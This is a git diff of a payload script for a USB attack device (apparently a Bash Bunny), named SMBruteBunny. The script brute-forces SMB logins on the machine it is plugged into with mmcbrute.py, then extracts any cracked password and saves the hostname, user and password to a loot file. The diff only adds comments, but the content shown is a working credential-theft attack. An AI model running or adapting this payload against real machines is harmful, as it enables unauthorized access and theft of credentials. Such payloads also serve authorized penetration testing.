diff --git a/payloads/library/credentials/SMBruteBunny/payload.txt b/payloads/library/credentials/SMBruteBunny/payload.txt index e34a32e5..59ef97ee 100644 --- a/payloads/library/credentials/SMBruteBunny/payload.txt +++ b/payloads/library/credentials/SMBruteBunny/payload.txt @@ -16,13 +16,16 @@ ATTACKMODE HID RNDIS_ETHERNET mount /dev/nandf /root/udisk/ GET TARGET_IP GET TARGET_HOSTNAME + # Perform SMB bruteforce attack LED STAGE1 python $ORIGINAL_SWITCH/mmcbrute/mmcbrute.py -t $TARGET_IP -u $user_bruteforce_list -p $pass_bruteforce_list 2> $password_process_file + # Check for results LED STAGE2 if grep -q "Success" $password_process_file; then LED G + # Extract and Store the loot, then quack it pass=$(cat $password_process_file | grep "./" | cut -d "/" -f 2 | cut -d ":" -f 2) echo "Machine: $TARGET_HOSTNAME - User: $user - Pass: $pass" >> $password_loot_file